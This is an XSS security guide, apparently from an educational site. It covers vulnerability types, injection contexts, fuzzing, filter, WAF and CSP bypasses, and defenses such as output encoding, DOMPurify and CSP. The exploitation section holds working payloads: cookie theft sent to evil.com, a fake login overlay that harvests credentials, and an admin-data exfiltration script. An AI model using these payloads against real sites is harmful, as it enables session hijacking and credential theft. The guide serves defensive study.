๐Ÿ“š Documentation

๐Ÿ›ก๏ธ Complete XSS Security Guide

Master Cross-Site Scripting vulnerabilities, bypass techniques, and defense strategies

|
๐ŸŽฏ

Purpose

This documentation provides comprehensive coverage of XSS vulnerabilities, from basic concepts to advanced exploitation techniques.

๐Ÿ”ฌ

Research-Focused

Based on latest security research, bug bounty findings, and real-world penetration testing scenarios.

โš–๏ธ

Ethical Use

All techniques documented here are for educational purposes and authorized security testing only.

๐Ÿš€

Practical Focus

Hands-on examples, real-world scenarios, and actionable defensive strategies for security professionals.

โš ๏ธ Important Notice

Educational Purpose: This documentation is for authorized security testing and educational use only. Always obtain proper written authorization before testing any systems.

๐Ÿ“– XSS Fundamentals

What is Cross-Site Scripting (XSS)?

Cross-Site Scripting (XSS) is a type of security vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. When the victim loads the page, the malicious script executes in their browser, potentially allowing the attacker to:

Steal Session Cookies

Access authentication tokens and hijack user sessions

Perform Actions as User

Execute any action the user can perform on the website

Access Sensitive Data

Read private information displayed on the page

Phishing Attacks

Display fake forms to capture credentials

Malicious Redirects

Redirect users to malicious websites or download malware

Network Reconnaissance

Scan internal networks and gather system information

Interactive XSS Demo

Welcome! Your output will appear here...

โš ๏ธ This is a safe simulation - no actual XSS execution occurs

Types of XSS Vulnerabilities

๐Ÿ”„ Reflected XSS

High Risk

The malicious script is reflected off the web server as part of the response. The payload is typically delivered via URL parameters or form submissions.

Vulnerable Code Example 
<!-- Vulnerable PHP code -->
<h1>Welcome <?php echo $_GET['name']; ?>!</h1>

<!-- Malicious URL -->
https://example.com/welcome.php?name=<script>alert('XSS')</script>
1
Attacker crafts malicious URL

Creates a URL with XSS payload in parameters

โ†’
2
Victim clicks malicious link

Social engineering or phishing email

โ†’
3
Server reflects payload

Payload included in server response

โ†’
4
Script executes in browser

Malicious code runs in victim's browser

๐Ÿ’พ Stored XSS

Critical Risk

The malicious script is permanently stored on the target server (database, file system, etc.) and served to users when they access the affected page.

Vulnerable Comment System 
<!-- Vulnerable comment display -->
<div class="comment">
    <h4><?php echo $comment['author']; ?></h4>
    <p><?php echo $comment['message']; ?></p>
</div>

<!-- Malicious comment payload -->
Author: <script>document.location='http://evil.com/steal.php?cookie='+document.cookie</script>
Payload Injection

Attacker submits malicious script via form

Storage

Malicious script stored in database

Victim Access

Any user visiting the page triggers XSS

Persistent Impact

Affects multiple users over time

๐ŸŒ DOM-Based XSS

High Risk

The vulnerability exists in client-side JavaScript code. The payload modifies the DOM environment without requiring server interaction.

Vulnerable JavaScript Code 
// Vulnerable DOM manipulation
var name = location.hash.substring(1);
document.getElementById('welcome').innerHTML = 'Hello ' + name;

// Malicious URL
https://example.com/page.html#<script>alert('XSS')</script>
๐Ÿ” Common Sources
  • location.href
  • location.search
  • location.hash
  • document.referrer
  • window.name
  • postMessage data
๐ŸŽฏ Common Sinks
  • innerHTML
  • outerHTML
  • document.write()
  • eval()
  • setTimeout()
  • location.href

XSS Execution Contexts

Understanding where your payload will be executed is crucial for crafting effective XSS attacks. Different contexts require different approaches:

HTML Context

Payload is reflected directly into HTML content:

Vulnerable:
<div>Hello $userInput</div>
Payload:
<script>alert('XSS')</script>
Result:
<div>Hello <script>alert('XSS')</script></div>

Attribute Context

Payload is reflected inside HTML attributes:

Vulnerable:
<input type="text" value="$userInput">
Payload:
" onmouseover="alert('XSS')
Result:
<input type="text" value="" onmouseover="alert('XSS')">

JavaScript Context

Payload is reflected inside JavaScript code:

Vulnerable:
<script>var name = '$userInput';</script>
Payload:
';alert('XSS');//
Result:
<script>var name = '';alert('XSS');//';</script>

CSS Context

Payload is reflected inside CSS styles:

Vulnerable:
<style>body { background: $userColor; }</style>
Payload:
red; } </style><script>alert('XSS')</script>
Result:
<style>body { background: red; } </style><script>alert('XSS')</script>; }</style>

URL Context

Payload is reflected in URLs or href attributes:

Vulnerable:
<a href="$userURL">Click here</a>
Payload:
javascript:alert('XSS')
Result:
<a href="javascript:alert('XSS')">Click here</a>

๐Ÿ” XSS Detection Techniques

Manual Testing Strategies

Manual testing remains one of the most effective ways to discover XSS vulnerabilities. Here are proven strategies:

๐ŸŽฏ Input Point Identification

  • URL parameters (?param=value)
  • Form fields (text inputs, textareas, hidden fields)
  • HTTP headers (User-Agent, Referer, X-Forwarded-For)
  • File uploads (filename, metadata)
  • API endpoints and JSON data
  • Cookie values

๐Ÿงช Basic Payload Testing

Progressive Testing Approach 
# 1. Start with simple HTML
<h1>test</h1>

# 2. Test script execution
<script>alert(1)</script>

# 3. Event handlers
<img src=x onerror=alert(1)>

# 4. Context breaking
"><script>alert(1)</script>
'><script>alert(1)</script>

# 5. Advanced payloads
<svg onload=alert(1)>
<iframe src=javascript:alert(1)>

Automated Scanning Tools

Automated scanners can help identify XSS vulnerabilities at scale, but manual testing is still essential for comprehensive coverage:

๐Ÿ•ท๏ธ Web Application Scanners

  • Burp Suite Professional - Industry standard web application security testing platform
  • OWASP ZAP - Free and open-source security testing proxy
  • Acunetix - Commercial vulnerability scanner with advanced crawling
  • Netsparker - Automated security scanner with proof-of-concept verification

โšก Specialized XSS Tools

  • XSSStrike - Advanced XSS detection suite with fuzzing capabilities
  • XSSHunter - Blind XSS detection platform for stored vulnerabilities
  • XSSer - Automatic XSS detection and exploitation framework
  • Dalfox - Fast and powerful XSS scanner and parameter analysis tool

๐Ÿ’ก Best Practices for Automated Scanning

๐ŸŽฏ Configure Scope Properly

Define clear testing boundaries and exclude production systems from aggressive scans.

๐Ÿ”„ Combine Multiple Tools

Different scanners have different strengths - use multiple tools for comprehensive coverage.

๐Ÿ‘ฅ Manual Validation

Always manually verify automated findings to reduce false positives and understand impact.

๐Ÿ•’ Timing Considerations

Use appropriate delays between requests to avoid overwhelming target applications.

๐Ÿ“ Document Findings

Maintain detailed logs of scan results and methodologies for compliance and reporting.

๐Ÿ”„ Regular Updates

Keep scanning tools and payloads updated to detect latest vulnerabilities and bypass techniques.

Fuzzing Strategies

Fuzzing is an automated testing technique that involves sending unexpected, random, or malformed data to find XSS vulnerabilities:

๐ŸŽฒ Random Payload Fuzzing

Generate random payloads with varying characteristics:

Python Fuzzing Example 
# XSS Fuzzing Script
import random
import string

class XSSFuzzer:
    def __init__(self):
        self.tags = ['script', 'img', 'svg', 'iframe', 'input', 'body']
        self.events = ['onload', 'onerror', 'onclick', 'onmouseover']
        self.payloads = ['alert(1)', 'confirm(1)', 'prompt(1)']

    def generate_random_payload(self):
        tag = random.choice(self.tags)
        event = random.choice(self.events)
        payload = random.choice(self.payloads)
        return f'<{tag} {event}={payload}>'

    def generate_encoded_payload(self, payload):
        # URL encoding
        return ''.join(f'%{ord(c):02x}' for c in payload)

    def fuzz_endpoint(self, url, param):
        payloads = []
        for _ in range(100):
            base_payload = self.generate_random_payload()
            payloads.extend([
                base_payload,
                self.generate_encoded_payload(base_payload),
                base_payload.upper(),
                base_payload.replace('<', '&lt;'),
            ])
        return payloads

๐Ÿงฌ Mutation-Based Fuzzing

Start with known working payloads and mutate them:

Character Insertion
<scri\x00pt>alert(1)</script>
Case Randomization
<ScRiPt>aLeRt(1)</ScRiPt>
Whitespace Injection
<script\x20>alert(1)</script>
Comment Insertion
<script>/**/alert(1)</script>

๐ŸŽฏ Context-Aware Fuzzing

Tailor payloads to specific injection contexts:

HTML Attribute Context
" autofocus onfocus=alert(1) x="
' autofocus onfocus=alert(1) x='
JavaScript String Context
';alert(1);//
';alert(1);/*
URL Parameter Context
javascript:alert(1)
data:text/html,<script>alert(1)</script>

๐Ÿ›ก๏ธ Advanced Bypass Techniques

Filter Evasion Techniques

๐ŸŽญ Case Manipulation

Many filters check for exact case matches and can be bypassed with case variations:

<ScRiPt>alert(1)</ScRiPt>
<SCRIPT>alert(1)</SCRIPT>
<script >alert(1)</script>
<script	>alert(1)</script>
<script
>alert(1)</script>

๐Ÿ”ค Encoding Bypass

Various encoding techniques can bypass input validation:

URL Encoding
%3Cscript%3Ealert(1)%3C/script%3E
HTML Entity Encoding
&lt;script&gt;alert(1)&lt;/script&gt;
Unicode Encoding
\u003cscript\u003ealert(1)\u003c/script\u003e
Hex Encoding
\x3cscript\x3ealert(1)\x3c/script\x3e

๐Ÿงฉ Alternative Event Handlers

When common event handlers are blocked, try these alternatives:

Mouse Events
  • onmouseover
  • onmouseout
  • onmousedown
  • onmouseup
  • onclick
  • ondblclick
Keyboard Events
  • onkeydown
  • onkeyup
  • onkeypress
Form Events
  • onfocus
  • onblur
  • onchange
  • onsubmit
Other Events
  • onload
  • onerror
  • onresize
  • onscroll

WAF Bypass Techniques

Web Application Firewalls (WAFs) implement various rules to block XSS attacks. Here are proven bypass techniques:

โ˜๏ธ Cloudflare Bypasses

# Unicode bypass
<script>alert\u0028\u0031\u0029</script>

# Case variation
<ScRiPt>alert(1)</ScRiPt>

# Encoding combination
<script>eval(atob('YWxlcnQoMSk='))</script>

# Template literals
<script>alert`1`</script>

๐ŸŒฉ๏ธ AWS WAF Bypasses

# Mixed case with spaces
< ScRiPt >alert(1)</ ScRiPt >

# Alternative tags
<svg onload=alert(1)>
<iframe src=javascript:alert(1)>

# Event handler variations
<img src=x oNlOaD=alert(1)>
<body oNlOaD=alert(1)>

๐Ÿ”’ ModSecurity Bypasses

# Comment injection
<script>/**/alert(1)</script>
<script>alert/**/('1')</script>

# String concatenation
<script>alert('1'+'')</script>
<script>alert(String.fromCharCode(49))</script>

# Alternative execution
<script>Function('alert(1)')()</script>

Content Security Policy (CSP) Bypasses

CSP is a powerful defense mechanism, but certain configurations can be bypassed:

๐Ÿ“ฆ JSONP Endpoints Abuse

If CSP allows certain domains, look for JSONP endpoints that can be abused:

# Google APIs
<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)"></script>

# AngularJS CDN
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js"></script>
<div ng-app ng-csp ng-click=$event.view.alert(1337)>Click me</div>

๐Ÿ”— Base Tag Injection

Manipulate relative URLs by injecting a base tag:

<base href="//evil.com/">
<script src="./legitimate-script.js"></script>

๐Ÿ“ Nonce/Hash Bypasses

When nonces or hashes are used, look for ways to predict or reuse them:

# Nonce reuse
<script nonce="abc123">alert(1)</script>

# Hash collision
<script>alert(1)//[...]</script>

Advanced Encoding Techniques

Various encoding methods can help bypass filters that don't properly decode input:

๐Ÿ”ข Numeric Character References

# Decimal encoding
&#60;script&#62;alert(1)&#60;/script&#62;

# Hexadecimal encoding
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;

# Mixed encoding
&#60;scr&#x69;pt&#62;alert(1)&#60;/script&#62;

๐ŸŒ Unicode Normalization

# Unicode normalization bypass
<script>alert\u0028\u0031\u0029</script>

# Unicode overlong encoding
<script>eval('\\u{61}\\u{6C}\\u{65}\\u{72}\\u{74}(1)')</script>

# Surrogate pairs
<script>alert\uD83D\uDE00</script>

๐Ÿ“ฆ Base64 and Alternative Encodings

# Base64 payload
<script>eval(atob('YWxlcnQoMSk='))</script>

# Binary encoding
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

# Octal encoding
<script>eval('\141\154\145\162\164\50\61\51')</script>

โšก Alternative Execution Methods

# Template literals
<script>alert`1`</script>
<script>alert\x60${1}\x60</script>

# Function constructor
<script>Function('alert(1)')()</script>
<script>[].constructor.constructor('alert(1)')()</script>

# setTimeout with string
<script>setTimeout('alert(1)',0)</script>
<script>setInterval('alert(1)',1000)</script>

๐Ÿ› XSS Exploitation Techniques

Understanding how XSS vulnerabilities can be exploited helps in both attack and defense scenarios.

Session Hijacking

One of the most common and dangerous XSS exploitation techniques involves stealing user session cookies:

๐Ÿช Cookie Theft

Basic Cookie Stealing Payload 
// Simple cookie exfiltration
<script>
  var img = new Image();
  img.src = 'https://evil.com/steal.php?cookie=' + document.cookie;
</script>

// Advanced cookie theft with user info
<script>
  fetch('https://evil.com/collect', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({
      cookies: document.cookie,
      url: window.location.href,
      userAgent: navigator.userAgent,
      timestamp: new Date().toISOString()
    })
  });
</script>
๐Ÿ›ก๏ธ Prevention Measures
  • Set HttpOnly flag on sensitive cookies
  • Use SameSite cookie attribute
  • Implement proper session validation
  • Use short session timeouts

Phishing Attacks via XSS

XSS can be used to create convincing phishing attacks that appear to originate from the trusted domain:

๐ŸŽฃ Fake Login Forms

Phishing Form Injection 
// Inject fake login form
<script>
// Hide original content
document.body.innerHTML = '';

// Create fake login form
var form = `
<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:#fff;z-index:9999">
  <div style="max-width:400px;margin:100px auto;padding:20px;border:1px solid #ccc">
    <h2>Session Expired - Please Login</h2>
    <form id="phishForm">
      <input type="email" placeholder="Email" id="email" required><br><br>
      <input type="password" placeholder="Password" id="password" required><br><br>
      <button type="submit">Login</button>
    </form>
  </div>
</div>`;

document.body.innerHTML = form;

// Capture credentials
document.getElementById('phishForm').onsubmit = function(e) {
  e.preventDefault();
  var email = document.getElementById('email').value;
  var password = document.getElementById('password').value;

  // Send to attacker's server
  fetch('https://evil.com/harvest', {
    method: 'POST',
    body: JSON.stringify({email, password, site: location.hostname})
  }).then(() => {
    window.location = '/login?expired=1';
  });
};
</script>

Privilege Escalation

XSS can sometimes be leveraged to escalate privileges within an application:

๐Ÿ‘‘ Admin Panel Access

// Attempt to access admin functionality
<script>
// Check if user has admin access
fetch('/admin/dashboard')
  .then(response => {
    if (response.ok) {
      // User has admin access, perform privileged actions
      fetch('/admin/users', {method: 'GET'})
        .then(r => r.json())
        .then(users => {
          // Exfiltrate user data
          fetch('https://evil.com/admin-data', {
            method: 'POST',
            body: JSON.stringify(users)
          });
        });
    }
  })
  .catch(() => {
  });
</script>

๐Ÿ”’ XSS Prevention Strategies

Input Validation & Sanitization

โœ… Server-Side Validation

PHP Example - Input Sanitization 
<?php
// Whitelist approach
function sanitizeInput($input) {
    // Remove all HTML tags
    $input = strip_tags($input);

    // Convert special characters
    $input = htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    // Additional validation
    if (!preg_match('/^[a-zA-Z0-9\s\-_.]+$/', $input)) {
        throw new InvalidArgumentException('Invalid characters detected');
    }

    return $input;
}

// Usage
$userInput = sanitizeInput($_POST['username']);
echo "Hello " . $userInput;
?>

๐Ÿ›ก๏ธ Client-Side Validation

JavaScript Example - DOMPurify 
// Using DOMPurify for client-side sanitization
import DOMPurify from 'dompurify';

function sanitizeHTML(dirty) {
    // Configure DOMPurify
    const clean = DOMPurify.sanitize(dirty, {
        ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
        ALLOWED_ATTR: ['href'],
        ALLOW_DATA_ATTR: false
    });

    return clean;
}

// Usage
const userInput = document.getElementById('userInput').value;
const sanitized = sanitizeHTML(userInput);
document.getElementById('output').innerHTML = sanitized;

Context-Aware Output Encoding

Different contexts require different encoding strategies:

๐Ÿ“ HTML Context

// HTML Entity Encoding
function htmlEncode(str) {
    return str
        .replace(/&/g, '&')
        .replace(//g, '>')
        .replace(/"/g, '"')
        .replace(/'/g, ''');
}

๐Ÿ”— URL Context

// URL Encoding
function urlEncode(str) {
    return encodeURIComponent(str);
}

// Usage in href attributes
const userUrl = urlEncode(userInput);
element.href = 'https://example.com/redirect?url=' + userUrl;

๐Ÿ“œ JavaScript Context

// JavaScript String Escaping
function jsEscape(str) {
    return str
        .replace(/\\/g, '\\\\')
        .replace(/'/g, "\\'")
        .replace(/"/g, '\\"')
        .replace(/\n/g, '\\n')
        .replace(/\r/g, '\\r')
        .replace(/\t/g, '\\t');
}

๐ŸŽจ CSS Context

// CSS Escaping
function cssEscape(str) {
    return str.replace(/[^a-zA-Z0-9]/g, function(match) {
        return '\\' + match.charCodeAt(0).toString(16) + ' ';
    });
}

Content Security Policy Implementation

๐Ÿ”ฐ Basic CSP

# Basic protection
Content-Security-Policy: default-src 'self'; script-src 'self'

๐Ÿ”ต Intermediate CSP

# More restrictive
Content-Security-Policy:
    default-src 'none';
    script-src 'self' 'unsafe-inline';
    style-src 'self' 'unsafe-inline';
    img-src 'self' data: https:;
    connect-src 'self';

๐Ÿ”ด Strict CSP

# Maximum security
Content-Security-Policy:
    default-src 'none';
    script-src 'self' 'nonce-{random}';
    style-src 'self' 'nonce-{random}';
    img-src 'self';
    connect-src 'self';
    form-action 'self';
    base-uri 'self';

๐Ÿ› ๏ธ Tools & Resources

๐Ÿ” Testing Tools

Burp Suite Professional

Industry-standard web application security testing platform with advanced XSS detection capabilities.

Visit Website

OWASP ZAP

Free, open-source web application security scanner with automated XSS detection.

Visit Website

XSSStrike

Advanced XSS detection suite with intelligent payload generation and DOM analyzer.

GitHub Repository

๐Ÿ›ก๏ธ Defense Libraries

DOMPurify

Fast, tolerant XSS sanitizer for HTML, MathML and SVG.

GitHub Repository

OWASP Java HTML Sanitizer

Fast and easy to configure HTML Sanitizer written in Java.

OWASP Project

๐Ÿ“š References & Credits

๐Ÿ“– Official Documentation

๐Ÿ”ฌ Research Papers

๐ŸŽ“ Educational Resources

๐Ÿ‘ฅ Community & Contributors

This documentation is based on research and contributions from the security community:

  • OWASP Foundation - Web application security standards
  • PortSwigger Research Team - Web security research and tools
  • Google Security Team - CSP development and research
  • Mozilla Security Team - Web platform security
  • Security Researchers Worldwide - Bug bounty hunters and penetration testers

๐Ÿ™ Acknowledgments

Special thanks to the security research community for their continuous efforts in making the web safer. This documentation compiles knowledge from years of security research, responsible disclosure, and community collaboration.